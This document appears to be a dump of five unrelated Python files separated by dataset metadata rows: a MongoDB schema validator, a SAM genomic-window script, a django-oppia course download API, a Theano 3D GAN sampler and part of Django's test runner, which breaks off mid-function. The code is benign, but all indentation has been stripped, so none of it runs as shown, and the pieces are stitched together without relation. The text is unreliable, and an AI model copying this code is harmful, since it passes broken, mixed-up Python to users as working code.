def _validate_required(self, doc, _struct, _path="", _root_path=""):
doted_struct = DotCollapsedDict(self.structure)
doted_doc = DotCollapsedDict(doc, reference=doted_struct)
for req in self.required_fields:
if doted_doc.get(req) is None and doted_struct.get(req) is not dict:
if not isinstance(doted_struct.get(req), CustomType):
self._raise_exception(RequireFieldError, req, "%s is required" % req)
elif isinstance(doted_struct.get(req), CustomType) and doted_struct[req].mongo_type is not dict:
self._raise_exception(RequireFieldError, req, "%s is required" % req)
elif doted_doc.get(req) == []:
self._raise_exception(RequireFieldError, req, "%s is required" % req)
elif doted_doc.get(req) == {}:
self._raise_exception(RequireFieldError, req, "%s is required" % req)
def __generate_skeleton(self, doc, struct, path=""):
for key in struct:
if type(key) is type:
new_key = "$%s" % key.__name__
else:
new_key = key
new_path = ".".join([path, new_key]).strip('.')
#
# Automatique generate the skeleton with NoneType
#
if type(key) is not type and key not in doc:
if isinstance(struct[key], dict):
if type(struct[key]) is dict and self.use_dot_notation:
if new_path in self._i18n_namespace:
doc[key] = i18nDotedDict(doc.get(key, {}), self)
else:
doc[key] = DotedDict(doc.get(key, {}), warning=self.dot_notation_warning)
else:
if callable(struct[key]):
doc[key] = struct[key]()
else:
doc[key] = type(struct[key])()
elif struct[key] is dict:
doc[key] = {}
elif isinstance(struct[key], list):
doc[key] = type(struct[key])()
elif isinstance(struct[key], CustomType):
if struct[key].init_type is not None:
doc[key] = struct[key].init_type()
else:
doc[key] = None
elif struct[key] is list:
doc[key] = []
elif isinstance(struct[key], tuple):
doc[key] = [None for _ in range(len(struct[key]))]
else:
doc[key] = None
#
# if the value is a dict, we have a another structure to validate
#
if isinstance(struct[key], dict) and type(key) is not type:
self.__generate_skeleton(doc[key], struct[key], new_path)
def __generate_doted_dict(self, doc, struct, path=""):
for key in struct:
#
# Automatique generate the skeleton with NoneType
#
if type(key) is type:
new_key = "$%s" % key.__name__
else:
new_key = key
new_path = ".".join([path, new_key]).strip('.')
if type(key) is not type: # and key not in doc:
if isinstance(struct[key], dict):
if type(struct[key]) is dict:
if new_path in self._i18n_namespace:
doc[key] = i18nDotedDict(doc.get(key, {}), self)
else:
doc[key] = DotedDict(doc.get(key, {}), warning=self.dot_notation_warning)
#
# if the value is a dict, we have a another structure to validate
#
if isinstance(struct[key], dict) and type(key) is not type:
self.__generate_doted_dict(doc[key], struct[key], new_path)
def _make_i18n(self):
doted_dict = DotCollapsedDict(self.structure)
for field in self.i18n:
if field not in doted_dict:
self._raise_exception(ValidationError, field,
"%s not found in structure" % field)
if not isinstance(doted_dict[field], i18n):
doted_dict[field] = i18n(
field_type=doted_dict[field],
field_name=field
)
self.structure.update(DotExpandedDict(doted_dict))
def set_lang(self, lang):
self._current_lang = lang
def get_lang(self):
return self._current_lang
class i18n(dict, CustomType):
""" CustomType to deal with i18n """
mongo_type = list
def __init__(self, field_type=None, field_name=None):
super(i18n, self).__init__()
self.python_type = self.__class__
self._field_type = field_type
self._field_name = field_name
def __call__(self):
return i18n(self._field_type, self._field_name)
def to_bson(self, value):
if value is not None:
for l, v in value.iteritems():
if isinstance(v, list) and isinstance(self._field_type, list):
for i in v:
if not isinstance(i, self._field_type[0]):
raise SchemaTypeError("%s (%s) must be an instance of %s not %s" % (
self._field_name, l, self._field_type[0], type(i).__name__))
else:
if not isinstance(v, self._field_type):
raise SchemaTypeError("%s (%s) must be an instance of %s not %s" % (
self._field_name, l, self._field_type, type(v).__name__))
return [{'lang': l, 'value': v} for l, v in value.iteritems()]
def to_python(self, value):
if value is not None:
i18n_dict = self.__class__(self._field_type)
for i in value:
i18n_dict[i['lang']] = i['value']
return i18n_dict
class Set(CustomType):
""" SET custom type to handle python set() type """
init_type = set
mongo_type = list
python_type = set
def __init__(self, structure_type=None):
super(Set, self).__init__()
self._structure_type = structure_type
def to_bson(self, value):
if value is not None:
return list(value)
def to_python(self, value):
if value is not None:
return set(value)
def validate(self, value, path):
if value is not None and self._structure_type is not None:
for val in value:
if not isinstance(val, self._structure_type):
raise ValueError('%s must be an instance of %s not %s' %
(path, self._structure_type.__name__, type(val).__name__))
| bsd-3-clause | 3,304,417,042,122,618,000 | 42.996907 | 117 | 0.506455 | false |
JohnUrban/fast5tools | bin/samGenomicWindows.py | 1 | 5426 | #!/usr/bin/env python2.7
import argparse
from collections import defaultdict
from fast5tools.samclass import *
from fast5tools.samops import *
parser = argparse.ArgumentParser(description="""
DESCRIPTION
Given a SAM file (with F5:Z: info attached) that is sorted by read name:
- get the alignment or set of splitread alignments for each read
- determine most likely genomic region read came from (assuming no structural variation)
- if one alignment, assume it comes from there
- if multiple alignments,
check for overlap of their individual genomic windows (alignment adjusted for clipping on each side + flank/buffer)
if no merges,
use majority or longest alignment (majority is longest alignment that also meets a majority threshold)
if there is a single merge -- i.e. they all come from same genomic region (and perhaps required to be ordered and stranded - see options) -
use merged result from merged genomic windows
if there is 1 or more merges (but still more than 1 genomic region)
see if longest merge has a 'spanning alignment' longer than longest/majority alignment
if so use that, if not use the longest/majority alignment
- report on alignments and merges in all cases
- get coordinates for a window that surrounds that chosen genomic region
- this is the chosen genomic window for that read
- coordinates for genomic window should be proportional to read length + some extra buffering/flanking sequence
- print out gw coordinates, notes on choice, F5 info, and perhaps genomic sequence chosen
flank=0.25, merge_dist=0, majority=0.5, require_order=False, require_strand=False, reference=False
flank = Add buffer/flank lengths to each side of a genomic window in two ways:
(1) int > 1 adds/subtracts that int.
(2) float [0,1] adds/subtracts that proportion of read length
NOTE: 1 defaults to 100% of read length, not 1 bp
merge_dist:
allows a gap up to d between intervals to still be an overlap - default 0
majority
threshold to exceed to be considered a majority.
require_order
when True, alignments must be ordered as they appear in the read to be considered a valid merge.
Defaults to False as noisy alignments could easily break this. Status is reported in output anyway.
require_strand
when True, alignments must ALL be on the same strand to be considered a valid merge.
Defaults to False as noisy alignments could easily break this. Status is reported in output anyway.
""", formatter_class= argparse.RawTextHelpFormatter)
parser_input = parser.add_mutually_exclusive_group(required=True)
parser_input.add_argument('--sam', '-s',
type= str, default=False,
help='''Input file in SAM format.''')
## FOR NOW, MUST BE SAM -- NOT BAM -- but can be STDIN SAM
##parser_input.add_argument('--bam', '-b',
## type= str, default=False,
## help='''Input file in BAM format.''')
parser.add_argument('--flank', '-f', type=float, default=0.25,
help=''' ''')
parser.add_argument('--merge_dist', '-m', type=int, default=0,
help=''' ''')
parser.add_argument('--majority', '-M', type=float, default=0.5,
help=''' ''')
parser.add_argument('--require_order', '-ro', action='store_true', default=False,
help=''' ''')
parser.add_argument('--require_strand', '-rs', action='store_true', default=False,
help=''' ''')
parser.add_argument('--reference', '-r', type=str, default=False,
help=''' Path to reference genome file to be used to extract sequences corresponding to genomic windows identified.
Optional. Sequences will be tagged on to an additional end column if provided.''')
parser.add_argument('--getF5info', '-f5', action='store_true', default=False,
help='''Return F5:Z: field from fast5tools in output.
This is from extracting fasta/fastq using fast5tofastx.py with --comments and --samflag''')
parser.add_argument('--getBCinfo', '-BC', action='store_true', default=False,
help=''' Return BC:Z: field from fast5tools in output.
This is from creating fasta/fastq from output of fast5_sw_bardecoder.py specified with --sequence/--quals,
and merging all desired barcode info into string following BC:Z:''')
parser.add_argument('--do_not_adjust_window_for_clipping', '-noadjust', action='store_true', default=False,
help=''' By default, the genomic window is pushed out at least as far as it would need to be to include soft/hard clipped regions at 5'/3' ends. This turns it off.''')
args = parser.parse_args()
get_genomic_windows(samfilepath=args.sam, flank=args.flank, merge_dist=args.merge_dist, majority=args.majority, require_order=args.require_order, require_strand=args.require_strand, reference=args.reference, getF5field=args.getF5info, getBCfield=args.getBCinfo, adjust_for_clipping_in_output=(not args.do_not_adjust_window_for_clipping))
| mit | 6,325,595,526,689,239,000 | 51.679612 | 337 | 0.651861 | false |
DigitalCampus/django-oppia | api/resources/course.py | 1 | 9945 | import json
import os
import re
import shutil
import xmltodict
import zipfile
from django.conf import settings
from django.conf.urls import url
from django.core.exceptions import MultipleObjectsReturned
from django.db.models import Q
from django.http import HttpResponse, Http404
from django.utils.translation import ugettext_lazy as _
from tastypie import fields
from tastypie.authentication import ApiKeyAuthentication, Authentication
from tastypie.authorization import ReadOnlyAuthorization, Authorization
from tastypie.resources import ModelResource
from tastypie.utils import trailing_slash
from api.serializers import CourseJSONSerializer
from oppia.models import Tracker, Course, CourseCategory
from oppia.signals import course_downloaded
STR_COURSE_NOT_FOUND = _(u"Course not found")
def get_course_from_shortname(resource, bundle, lookup):
object_list = resource.apply_filters(bundle.request,
{'shortname': lookup})
if len(object_list) <= 0:
raise resource._meta.object_class.DoesNotExist(
"Couldn't find an course with shortname '%s'." % (lookup))
elif len(object_list) > 1:
raise MultipleObjectsReturned(
"More than one course with shortname '%s'." % (lookup))
return object_list
class CourseResource(ModelResource):
class Meta:
queryset = Course.objects.all()
resource_name = 'course'
allowed_methods = ['get']
fields = ['id',
'title',
'version',
'shortname',
'priority',
'is_draft',
'description',
'author',
'username',
'organisation']
authentication = ApiKeyAuthentication()
authorization = ReadOnlyAuthorization()
serializer = CourseJSONSerializer()
always_return_data = True
include_resource_uri = True
def obj_get(self, bundle, **kwargs):
"""
Overriden get method to perform a direct lookup if we are searching
by shortname instead of pk
"""
lookup = kwargs[self._meta.detail_uri_name]
if re.search('[a-zA-Z]', lookup):
object_list = get_course_from_shortname(self, bundle, lookup)
bundle.obj = object_list[0]
self.authorized_read_detail(object_list, bundle)
return bundle.obj
else:
return super().obj_get(bundle, **kwargs)
def get_object_list(self, request):
if request.user.is_staff:
return Course.objects.filter(is_archived=False) \
.order_by('-priority', 'title')
else:
return Course.objects.filter(is_archived=False) \
.filter(
Q(is_draft=False) |
(Q(is_draft=True) & Q(user=request.user))) \
.order_by('-priority', 'title')
def prepend_urls(self):
return [
url(r"^(?P<resource_name>%s)/(?P<pk>\w[\w/-]*)/download%s$"
% (self._meta.resource_name, trailing_slash()),
self.wrap_view('download_course'), name="api_download_course"),
url(r"^(?P<resource_name>%s)/(?P<pk>\w[\w/-]*)/activity%s$"
% (self._meta.resource_name, trailing_slash()),
self.wrap_view('download_activity'),
name="api_download_activity"),
]
def get_course(self, request, **kwargs):
self.is_authenticated(request)
self.throttle_check(request)
pk = kwargs.pop('pk', None)
try:
if request.user.is_staff:
course = self._meta.queryset.get(pk=pk, is_archived=False)
else:
course = self._meta.queryset \
.filter(
Q(is_draft=False) |
(Q(is_draft=True) & Q(user=request.user)) |
(Q(is_draft=True)
& Q(coursepermissions__user=request.user))) \
.distinct().get(pk=pk, is_archived=False)
except Course.DoesNotExist:
raise Http404(STR_COURSE_NOT_FOUND)
except ValueError:
try:
if request.user.is_staff:
course = self._meta.queryset.get(shortname=pk,
is_archived=False)
else:
course = self._meta.queryset \
.filter(
Q(is_draft=False) |
(Q(is_draft=True) & Q(user=request.user)) |
(Q(is_draft=True)
& Q(coursepermissions__user=request.user))) \
.distinct().get(shortname=pk, is_archived=False)
except Course.DoesNotExist:
raise Http404(STR_COURSE_NOT_FOUND)
return course
def download_course(self, request, **kwargs):
course = self.get_course(request, **kwargs)
file_to_download = course.getAbsPath()
has_completed_trackers = Tracker.has_completed_trackers(course,
request.user)
try:
if has_completed_trackers:
file_to_download = os.path.join(
settings.COURSE_UPLOAD_DIR,
"temp",
str(request.user.id) + "-" + course.filename)
shutil.copy2(course.getAbsPath(), file_to_download)
course_zip = zipfile.ZipFile(file_to_download, 'a')
if has_completed_trackers:
course_zip.writestr(course.shortname + "/tracker.xml",
Tracker.to_xml_string(course,
request.user))
course_zip.close()
binary_file = open(file_to_download, 'rb')
response = HttpResponse(binary_file.read(),
content_type='application/zip')
binary_file.close()
response['Content-Length'] = os.path.getsize(file_to_download)
response['Content-Disposition'] = \
'attachment; filename="%s"' % (course.filename)
except IOError:
raise Http404(STR_COURSE_NOT_FOUND)
course_downloaded.send(sender=self, course=course, request=request)
return response
def download_activity(self, request, **kwargs):
course = self.get_course(request, **kwargs)
return HttpResponse(Tracker.to_xml_string(course,
request.user),
content_type='text/xml')
def dehydrate(self, bundle):
bundle.data['url'] = bundle.request.build_absolute_uri(
bundle.data['resource_uri'] + 'download/')
# make sure title is shown as json object (not string representation \
# of one)
bundle.data['title'] = json.loads(bundle.data['title'])
try:
bundle.data['description'] = json.loads(bundle.data['description'])
except json.JSONDecodeError:
pass
course = Course.objects.get(pk=bundle.obj.pk)
if course and course.user:
bundle.data['author'] = course.user.first_name \
+ " " \
+ course.user.last_name
bundle.data['username'] = course.user.username
bundle.data['organisation'] = course.user.userprofile.organisation
return bundle
class CourseCategoryResource(ModelResource):
course = fields.ToOneField('api.resource.course.CourseResource',
'course',
full=True)
class Meta:
queryset = CourseCategory.objects.all()
allowed_methods = ['get']
resource_name = 'coursetag'
fields = ['id', 'course', 'category']
include_resource_uri = False
authentication = ApiKeyAuthentication()
authorization = ReadOnlyAuthorization()
always_return_data = True
class CourseStructureResource(ModelResource):
class Meta:
queryset = Course.objects.filter(is_draft=False, is_archived=False)
resource_name = 'coursestructure'
allowed_methods = ['get']
fields = ['shortname',
'id',
'structure']
authentication = Authentication()
authorization = Authorization()
serializer = CourseJSONSerializer()
always_return_data = True
include_resource_uri = True
def obj_get(self, bundle, **kwargs):
"""
Overriden get method to perform a direct lookup if we are searching
by shortname instead of pk
"""
lookup = kwargs[self._meta.detail_uri_name]
if re.search('[a-zA-Z]', lookup):
object_list = get_course_from_shortname(self, bundle, lookup)
return_obj = object_list[0]
else:
return_obj = super().obj_get(bundle, **kwargs)
# check the module.xml is on disk
path = os.path.join(settings.MEDIA_ROOT,
'courses',
return_obj.shortname,
'module.xml')
if not os.path.isfile(path):
raise self._meta.object_class.DoesNotExist()
return return_obj
def dehydrate(self, bundle):
path = os.path.join(settings.MEDIA_ROOT,
'courses',
bundle.obj.shortname,
'module.xml')
with open(path) as fd:
doc = xmltodict.parse(fd.read())
bundle.data['structure'] = json.dumps(doc)
return bundle
| gpl-3.0 | 3,532,451,220,382,889,000 | 37.103448 | 79 | 0.539769 | false |
yilei0620/3D_Conditional_Gan | GenSample_obj.py | 1 | 4544 | import sys
sys.path.append('..')
import os
import json
from time import time
import numpy as np
from sklearn.externals import joblib
import scipy
from scipy import io
# from matplotlib import pyplot as plt
# from sklearn.externals import joblib
import theano
import theano.tensor as T
from lib import activations
from lib import updates
from lib import inits
from lib.rng import py_rng, np_rng
from lib.ops import batchnorm, conv_cond_concat, conv, dropout
from lib.theano_utils import floatX, sharedX
from lib.data_utils import OneHot, shuffle, iter_data
from lib.metrics import nnc_score, nnd_score
from load import load_shapenet_train, load_shapenet_test
relu = activations.Rectify()
sigmoid = activations.Sigmoid()
lrelu = activations.LeakyRectify()
bce = T.nnet.binary_crossentropy
parameters = {'objectNumber': 2, 'Nz' : 200, 'Channel' :(1,64,128,256,512), 'kernal':(4,4,4,4), 'batchsize': 50, 'Convlayersize':(64,32,16,8,4), 'Genlrt' : 0.001, 'Discrimlrt' : 0.00001 , 'beta' : 0.5, 'l2':2.5e-5, 'Genk' : 2 , 'niter':50, 'niter_decay' : 150}
for p in parameters:
tmp = p + " = parameters[p]"
exec(tmp)
# print conditional,type(batchsize),Channel[-1],kernal
gifn = inits.Normal(scale=0.02)
difn = inits.Normal(scale=0.02)
## filter_shape: (output channels, input channels, filter height, filter width, filter depth)
## load the parameters
# gen_params = [gw1, gw2, gw3, gw4, gw5, gwx]
# discrim_params = [dw1, dw2, dw3, dw4, dw5, dwy]
temp = joblib.load('models%d/50_gen_params.jl'%objectNumber)
gw1 = sharedX(temp[0])
gg1 = sharedX(temp[1])
gb1 = sharedX(temp[2])
gw2 = sharedX(temp[3])
gg2 = sharedX(temp[4])
gb2 = sharedX(temp[5])
gw3 = sharedX(temp[6])
gg3 = sharedX(temp[7])
gb3 = sharedX(temp[8])
gw4 = sharedX(temp[9])
gg4 = sharedX(temp[10])
gb4 = sharedX(temp[11])
gwx = sharedX(temp[12])
gen_params = [gw1, gg1, gb1, gw2, gg2, gb2, gw3, gg3, gb3, gw4 ,gg4, gb4, gwx]
##
def gen(Z, w1, g1, b1, w2, g2, b2, w3, g3, b3, w4, g4, b4, wx):
Gl1 = relu(batchnorm(T.dot(Z, w1), g=g1, b=b1))
Gl1 = Gl1.reshape((Gl1.shape[0],Channel[-1],Convlayersize[-1],Convlayersize[-1],Convlayersize[-1]))
input_shape = (None , None,Convlayersize[-1],Convlayersize[-1],Convlayersize[-1])
filter_shape = (Channel[-1] , Channel[-2], kernal[-1], kernal[-1], kernal[-1])
Gl2 = relu(batchnorm(conv(Gl1,w2,filter_shape = filter_shape, input_shape = input_shape, conv_mode = 'deconv'),g = g2, b = b2))
input_shape = (None , None,Convlayersize[-2],Convlayersize[-2],Convlayersize[-2])
filter_shape = (Channel[-2] , Channel[-3], kernal[-2], kernal[-2], kernal[-2])
Gl3 = relu(batchnorm(conv(Gl2,w3,filter_shape = filter_shape, input_shape = input_shape, conv_mode = 'deconv'),g = g3, b = b3))
input_shape = (None , None,Convlayersize[-3],Convlayersize[-3],Convlayersize[-3])
filter_shape = (Channel[-3] , Channel[-4], kernal[-3], kernal[-3], kernal[-3])
Gl4 = relu(batchnorm(conv(Gl3,w4,filter_shape = filter_shape, input_shape = input_shape, conv_mode = 'deconv'),g = g4, b= b4))
input_shape = (None, None, Convlayersize[-4],Convlayersize[-4],Convlayersize[-4])
filter_shape = (Channel[-4], Channel[-5], kernal[-4], kernal[-4], kernal[-4])
GlX = sigmoid(conv(Gl4,wx,filter_shape = filter_shape, input_shape = input_shape, conv_mode = 'deconv'))
return GlX
X = T.tensor5()
Z = T.matrix()
gX = gen(Z, *gen_params)
print 'COMPILING'
t = time()
# _train_g = theano.function([X, Z, Y], cost, updates=g_updates)
# _train_d = theano.function([X, Z, Y], cost, updates=d_updates)
_gen = theano.function([Z], gX)
print '%.2f seconds to compile theano functions'%(time()-t)
# trX, trY, ntrain = load_shapenet_train()
n = 10
nbatch = 10
rng = np.random.RandomState(int(time()))
# sample_ymb = floatX(np.asarray(np.eye(3)))
z_dist = scipy.io.loadmat('Z_dist_class2.mat')
z_mean = z_dist['mean']
z_mean = np.reshape(z_mean,(Nz,1))
z_std = z_dist['std']
z_std = np.reshape(z_std,(Nz,1))
def gen_z(z_dist,nbatch):
ret = np.zeros((nbatch,Nz))
for j in xrange(Nz):
z_tmp = np_rng.normal(z_mean[j],z_std[j],nbatch)
ret[:,j] = z_tmp
# print ret
return ret
try:
os.mkdir('Gen_models%d'%objectNumber)
except:
pass
for j in xrange(n/nbatch):
sample_zmb = floatX(gen_z(z_dist,nbatch))
samples = np.asarray(_gen(sample_zmb))
for i in xrange(nbatch):
io.savemat('Gen_models%d/Gen_example_%d.mat'%(objectNumber,nbatch*j+i),{'instance':samples[i,:,:,:],'Z':sample_zmb[i,:]})
# niter = 1
# niter_decay = 1
| mit | 4,118,196,402,505,532,400 | 27.942675 | 261 | 0.659991 | false |
wkschwartz/django | tests/runtests.py | 2 | 23029 | #!/usr/bin/env python
import argparse
import atexit
import copy
import os
import shutil
import socket
import subprocess
import sys
import tempfile
import warnings
try:
import django
except ImportError as e:
raise RuntimeError(
'Django module not found, reference tests/README.rst for instructions.'
) from e
else:
from django.apps import apps
from django.conf import settings
from django.db import connection, connections
from django.test import TestCase, TransactionTestCase
from django.test.runner import default_test_processes
from django.test.selenium import SeleniumTestCaseBase
from django.test.utils import NullTimeKeeper, TimeKeeper, get_runner
from django.utils.deprecation import (
RemovedInDjango40Warning, RemovedInDjango41Warning,
)
from django.utils.log import DEFAULT_LOGGING
from django.utils.version import PY37
try:
import MySQLdb
except ImportError:
pass
else:
# Ignore informational warnings from QuerySet.explain().
warnings.filterwarnings('ignore', r'\(1003, *', category=MySQLdb.Warning)
# Make deprecation warnings errors to ensure no usage of deprecated features.
warnings.simplefilter("error", RemovedInDjango40Warning)
warnings.simplefilter('error', RemovedInDjango41Warning)
# Make resource and runtime warning errors to ensure no usage of error prone
# patterns.
warnings.simplefilter("error", ResourceWarning)
warnings.simplefilter("error", RuntimeWarning)
# Ignore known warnings in test dependencies.
warnings.filterwarnings("ignore", "'U' mode is deprecated", DeprecationWarning, module='docutils.io')
# RemovedInDjango41Warning: Ignore MemcachedCache deprecation warning.
warnings.filterwarnings(
'ignore',
'MemcachedCache is deprecated',
category=RemovedInDjango41Warning,
)
RUNTESTS_DIR = os.path.abspath(os.path.dirname(__file__))
TEMPLATE_DIR = os.path.join(RUNTESTS_DIR, 'templates')
# Create a specific subdirectory for the duration of the test suite.
TMPDIR = tempfile.mkdtemp(prefix='django_')
# Set the TMPDIR environment variable in addition to tempfile.tempdir
# so that children processes inherit it.
tempfile.tempdir = os.environ['TMPDIR'] = TMPDIR
# Removing the temporary TMPDIR.
atexit.register(shutil.rmtree, TMPDIR)
SUBDIRS_TO_SKIP = [
'data',
'import_error_package',
'test_runner_apps',
]
ALWAYS_INSTALLED_APPS = [
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sites',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.admin.apps.SimpleAdminConfig',
'django.contrib.staticfiles',
]
ALWAYS_MIDDLEWARE = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
]
# Need to add the associated contrib app to INSTALLED_APPS in some cases to
# avoid "RuntimeError: Model class X doesn't declare an explicit app_label
# and isn't in an application in INSTALLED_APPS."
CONTRIB_TESTS_TO_APPS = {
'deprecation': ['django.contrib.flatpages', 'django.contrib.redirects'],
'flatpages_tests': ['django.contrib.flatpages'],
'redirects_tests': ['django.contrib.redirects'],
}
def get_test_modules():
modules = []
discovery_paths = [(None, RUNTESTS_DIR)]
if connection.features.gis_enabled:
# GIS tests are in nested apps
discovery_paths.append(('gis_tests', os.path.join(RUNTESTS_DIR, 'gis_tests')))
else:
SUBDIRS_TO_SKIP.append('gis_tests')
for modpath, dirpath in discovery_paths:
for f in os.scandir(dirpath):
if ('.' not in f.name and
os.path.basename(f.name) not in SUBDIRS_TO_SKIP and
not f.is_file() and
os.path.exists(os.path.join(f.path, '__init__.py'))):
modules.append((modpath, f.name))
return modules
def get_installed():
return [app_config.name for app_config in apps.get_app_configs()]
def setup(verbosity, test_labels, parallel, start_at, start_after):
# Reduce the given test labels to just the app module path.
test_labels_set = set()
for label in test_labels:
bits = label.split('.')[:1]
test_labels_set.add('.'.join(bits))
if verbosity >= 1:
msg = "Testing against Django installed in '%s'" % os.path.dirname(django.__file__)
max_parallel = default_test_processes() if parallel == 0 else parallel
if max_parallel > 1:
msg += " with up to %d processes" % max_parallel
print(msg)
# Force declaring available_apps in TransactionTestCase for faster tests.
def no_available_apps(self):
raise Exception("Please define available_apps in TransactionTestCase "
"and its subclasses.")
TransactionTestCase.available_apps = property(no_available_apps)
TestCase.available_apps = None
state = {
'INSTALLED_APPS': settings.INSTALLED_APPS,
'ROOT_URLCONF': getattr(settings, "ROOT_URLCONF", ""),
'TEMPLATES': settings.TEMPLATES,
'LANGUAGE_CODE': settings.LANGUAGE_CODE,
'STATIC_URL': settings.STATIC_URL,
'STATIC_ROOT': settings.STATIC_ROOT,
'MIDDLEWARE': settings.MIDDLEWARE,
}
# Redirect some settings for the duration of these tests.
settings.INSTALLED_APPS = ALWAYS_INSTALLED_APPS
settings.ROOT_URLCONF = 'urls'
settings.STATIC_URL = '/static/'
settings.STATIC_ROOT = os.path.join(TMPDIR, 'static')
settings.TEMPLATES = [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
}]
settings.LANGUAGE_CODE = 'en'
settings.SITE_ID = 1
settings.MIDDLEWARE = ALWAYS_MIDDLEWARE
settings.MIGRATION_MODULES = {
# This lets us skip creating migrations for the test models as many of
# them depend on one of the following contrib applications.
'auth': None,
'contenttypes': None,
'sessions': None,
}
log_config = copy.deepcopy(DEFAULT_LOGGING)
# Filter out non-error logging so we don't have to capture it in lots of
# tests.
log_config['loggers']['django']['level'] = 'ERROR'
settings.LOGGING = log_config
settings.SILENCED_SYSTEM_CHECKS = [
'fields.W342', # ForeignKey(unique=True) -> OneToOneField
'fields.W903', # NullBooleanField deprecated.
]
# Load all the ALWAYS_INSTALLED_APPS.
django.setup()
# It would be nice to put this validation earlier but it must come after
# django.setup() so that connection.features.gis_enabled can be accessed
# without raising AppRegistryNotReady when running gis_tests in isolation
# on some backends (e.g. PostGIS).
if 'gis_tests' in test_labels_set and not connection.features.gis_enabled:
print('Aborting: A GIS database backend is required to run gis_tests.')
sys.exit(1)
def _module_match_label(module_label, label):
# Exact or ancestor match.
return module_label == label or module_label.startswith(label + '.')
# Load all the test model apps.
test_modules = get_test_modules()
found_start = not (start_at or start_after)
installed_app_names = set(get_installed())
for modpath, module_name in test_modules:
if modpath:
module_label = modpath + '.' + module_name
else:
module_label = module_name
if not found_start:
if start_at and _module_match_label(module_label, start_at):
found_start = True
elif start_after and _module_match_label(module_label, start_after):
found_start = True
continue
else:
continue
# if the module (or an ancestor) was named on the command line, or
# no modules were named (i.e., run all), import
# this module and add it to INSTALLED_APPS.
module_found_in_labels = not test_labels or any(
_module_match_label(module_label, label) for label in test_labels_set
)
if module_name in CONTRIB_TESTS_TO_APPS and module_found_in_labels:
for contrib_app in CONTRIB_TESTS_TO_APPS[module_name]:
if contrib_app not in settings.INSTALLED_APPS:
settings.INSTALLED_APPS.append(contrib_app)
if module_found_in_labels and module_label not in installed_app_names:
if verbosity >= 2:
print("Importing application %s" % module_name)
settings.INSTALLED_APPS.append(module_label)
# Add contrib.gis to INSTALLED_APPS if needed (rather than requiring
# @override_settings(INSTALLED_APPS=...) on all test cases.
gis = 'django.contrib.gis'
if connection.features.gis_enabled and gis not in settings.INSTALLED_APPS:
if verbosity >= 2:
print("Importing application %s" % gis)
settings.INSTALLED_APPS.append(gis)
apps.set_installed_apps(settings.INSTALLED_APPS)
# Set an environment variable that other code may consult to see if
# Django's own test suite is running.
os.environ['RUNNING_DJANGOS_TEST_SUITE'] = 'true'
return state
def teardown(state):
# Restore the old settings.
for key, value in state.items():
setattr(settings, key, value)
# Discard the multiprocessing.util finalizer that tries to remove a
# temporary directory that's already removed by this script's
# atexit.register(shutil.rmtree, TMPDIR) handler. Prevents
# FileNotFoundError at the end of a test run (#27890).
from multiprocessing.util import _finalizer_registry
_finalizer_registry.pop((-100, 0), None)
del os.environ['RUNNING_DJANGOS_TEST_SUITE']
def actual_test_processes(parallel):
if parallel == 0:
# This doesn't work before django.setup() on some databases.
if all(conn.features.can_clone_databases for conn in connections.all()):
return default_test_processes()
else:
return 1
else:
return parallel
class ActionSelenium(argparse.Action):
"""
Validate the comma-separated list of requested browsers.
"""
def __call__(self, parser, namespace, values, option_string=None):
browsers = values.split(',')
for browser in browsers:
try:
SeleniumTestCaseBase.import_webdriver(browser)
except ImportError:
raise argparse.ArgumentError(self, "Selenium browser specification '%s' is not valid." % browser)
setattr(namespace, self.dest, browsers)
def django_tests(verbosity, interactive, failfast, keepdb, reverse,
test_labels, debug_sql, parallel, tags, exclude_tags,
test_name_patterns, start_at, start_after, pdb, buffer,
timing):
state = setup(verbosity, test_labels, parallel, start_at, start_after)
# Run the test suite, including the extra validation tests.
if not hasattr(settings, 'TEST_RUNNER'):
settings.TEST_RUNNER = 'django.test.runner.DiscoverRunner'
TestRunner = get_runner(settings)
test_runner = TestRunner(
verbosity=verbosity,
interactive=interactive,
failfast=failfast,
keepdb=keepdb,
reverse=reverse,
debug_sql=debug_sql,
parallel=actual_test_processes(parallel),
tags=tags,
exclude_tags=exclude_tags,
test_name_patterns=test_name_patterns,
pdb=pdb,
buffer=buffer,
timing=timing,
)
failures = test_runner.run_tests(test_labels or get_installed())
teardown(state)
return failures
def get_subprocess_args(options):
subprocess_args = [
sys.executable, __file__, '--settings=%s' % options.settings
]
if options.failfast:
subprocess_args.append('--failfast')
if options.verbosity:
subprocess_args.append('--verbosity=%s' % options.verbosity)
if not options.interactive:
subprocess_args.append('--noinput')
if options.tags:
subprocess_args.append('--tag=%s' % options.tags)
if options.exclude_tags:
subprocess_args.append('--exclude_tag=%s' % options.exclude_tags)
return subprocess_args
def bisect_tests(bisection_label, options, test_labels, parallel, start_at, start_after):
state = setup(options.verbosity, test_labels, parallel, start_at, start_after)
test_labels = test_labels or get_installed()
print('***** Bisecting test suite: %s' % ' '.join(test_labels))
# Make sure the bisection point isn't in the test list
# Also remove tests that need to be run in specific combinations
for label in [bisection_label, 'model_inheritance_same_model_name']:
try:
test_labels.remove(label)
except ValueError:
pass
subprocess_args = get_subprocess_args(options)
iteration = 1
while len(test_labels) > 1:
midpoint = len(test_labels) // 2
test_labels_a = test_labels[:midpoint] + [bisection_label]
test_labels_b = test_labels[midpoint:] + [bisection_label]
print('***** Pass %da: Running the first half of the test suite' % iteration)
print('***** Test labels: %s' % ' '.join(test_labels_a))
failures_a = subprocess.run(subprocess_args + test_labels_a)
print('***** Pass %db: Running the second half of the test suite' % iteration)
print('***** Test labels: %s' % ' '.join(test_labels_b))
print('')
failures_b = subprocess.run(subprocess_args + test_labels_b)
if failures_a.returncode and not failures_b.returncode:
print("***** Problem found in first half. Bisecting again...")
iteration += 1
test_labels = test_labels_a[:-1]
elif failures_b.returncode and not failures_a.returncode:
print("***** Problem found in second half. Bisecting again...")
iteration += 1
test_labels = test_labels_b[:-1]
elif failures_a.returncode and failures_b.returncode:
print("***** Multiple sources of failure found")
break
else:
print("***** No source of failure found... try pair execution (--pair)")
